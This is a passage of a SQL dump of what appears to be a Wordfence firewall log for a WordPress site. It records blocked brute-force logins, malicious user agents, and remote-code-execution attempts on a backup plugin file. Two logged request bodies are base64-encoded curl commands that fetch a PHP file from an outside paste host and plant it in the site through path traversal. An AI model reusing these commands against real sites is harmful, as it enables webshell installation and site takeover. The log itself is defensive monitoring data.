Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14999,0.000000,1704817221.776171,'\0\0\0\0\0\0\0\0\0\0 ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15000,0.000000,1704818587.006277,'\0\0\0\0\0\0\0\0\0\0E',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15001,0.000000,1704819943.242223,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15002,0.000000,1704820264.834330,'\0\0\0\0\0\0\0\0\0\0[9s',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15003,0.000000,1704820624.320187,'\0\0\0\0\0\0\0\0\0\0% ',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15004,0.000000,1704821139.112362,'\0\0\0\0\0\0\0\0\0\09\n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15005,0.000000,1704821282.301716,'\0\0\0\0\0\0\0\0\0\0.',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15006,0.000000,1704822973.858548,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15007,0.000000,1704822973.856852,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15008,1704823526.798805,1704823526.725200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15009,1704823526.797713,1704823526.724500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15010,0.000000,1704824020.007333,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15011,0.000000,1704824019.945706,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15012,0.000000,1704824176.672027,'\0\0\0\0\0\0\0\0\0\0L',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15013,1704824515.144855,1704824515.068800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15014,1704824515.136432,1704824515.066900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14998,0.000000,1704816785.739160,'\0\0\0\0\0\0\0\0\0\09!',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginFailInvalidUsername',NULL,NULL),(15045,1704830434.170446,1704830434.081100,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15056,0.000000,1704831940.714950,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15057,1704832353.162865,1704832353.033400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15058,1704832353.138272,1704832353.025700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15059,0.000000,1704832878.867059,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15046,1704830234.529423,1704830234.463300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15047,1704830233.667217,1704830233.591000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15048,0.000000,1704830490.136300,'\0\0\0\0\0\0\0\0\0\0D#|',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15049,0.000000,1704830648.563626,'\0\0\0\0\0\0\0\0\0\0ٹ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15050,0.000000,1704830756.416611,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15051,0.000000,1704830756.446131,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15052,1704831290.542257,1704831290.440300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15053,1704831290.530204,1704831290.438800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15054,0.000000,1704831822.341527,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15055,0.000000,1704831822.292941,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15064,0.000000,1704833732.530855,'\0\0\0\0\0\0\0\0\0\0՘E',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14880,1704759425.620124,1704759425.528300,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15015,0.000000,1704824754.496361,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15016,0.000000,1704825016.082355,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15017,0.000000,1704825016.181678,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15018,0.000000,1704825464.571060,'\0\0\0\0\0\0\0\0\0\0ٹ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15019,1704825561.939740,1704825561.851300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15020,1704825561.915528,1704825561.839600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15021,0.000000,1704825744.842193,'\0\0\0\0\0\0\0\0\0\0Q',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15022,0.000000,1704826077.339025,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15023,0.000000,1704826077.290858,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15024,1704826582.286739,1704826582.177600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15025,1704826582.285755,1704826582.175000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15026,0.000000,1704826755.815630,'\0\0\0\0\0\0\0\0\0\0~b',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15027,0.000000,1704827102.791268,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15028,0.000000,1704827102.789719,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15029,0.000000,1704827358.513089,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15030,0.000000,1704827620.678747,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15031,1704827624.440587,1704827624.359100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15032,1704827624.431968,1704827624.326400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15033,0.000000,1704828049.494588,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15034,0.000000,1704828145.900055,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15035,0.000000,1704828145.797782,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15036,1704828662.157783,1704828662.049800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15037,1704828662.155892,1704828662.047300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14881,1704759446.894000,1704759446.816400,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi8uLi93cC1icnNoLnBocCBodHRwczovL3JlbnRyeS5jby9tNW43d2UvcmF3\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(15061,0.000000,1704833234.987943,'\0\0\0\0\0\0\0\0\0\0n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15062,1704833414.076753,1704833413.976500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15063,1704833413.490097,1704833413.398500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14990,1704812611.887463,1704812611.798500,'\0\0\0\0\0\0\0\0\0\0^E$',0,403,0,0,0,'https://tummyrevolution.com/sample.php?pd=1&mapname=ova-tools.xml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NhbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14997,1704816241.821942,1704816241.757300,'\0\0\0\0\0\0\0\0\0\0G',0,403,0,0,0,'https://tummyrevolution.com//wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"category\":\"rce\",\"ssl\":1}'),(15060,0.000000,1704832878.878939,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14991,1704812600.652699,1704812600.556600,'\0\0\0\0\0\0\0\0\0\0^E$',0,403,0,0,0,'https://tummyrevolution.com/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14993,0.000000,1704814528.508703,'&\0<\0\0\0\0<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14994,0.000000,1704814739.666750,'\0\0\0\0\0\0\0\0\0\0-=E',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14995,0.000000,1704815144.002632,'\0\0\0\0\0\0\0\0\0\0kA',0,200,0,1,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailValidUsername',NULL,NULL),(14996,0.000000,1704815872.735891,'\0\0\0\0\0\0\0\0\0\0zb',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14992,0.000000,1704813175.589785,' A9\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15038,0.000000,1704829183.606112,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(15039,0.000000,1704829184.518076,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(15040,0.000000,1704829346.776342,'\0\0\0\0\0\0\0\0\0\0!',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15041,0.000000,1704829698.990719,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15042,0.000000,1704829698.881596,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14882,1704759470.799276,1704759470.722600,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi91cGxvYWRzL3dwLXNsaWIucGhwIGh0dHBzOi8vcmVudHJ5LmNvL201bjd3ZS9yYXc=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14901,0.000000,1704765171.785095,'\0\0\0\0\0\0\0\0\0\01Q',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14902,0.000000,1704765990.168408,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 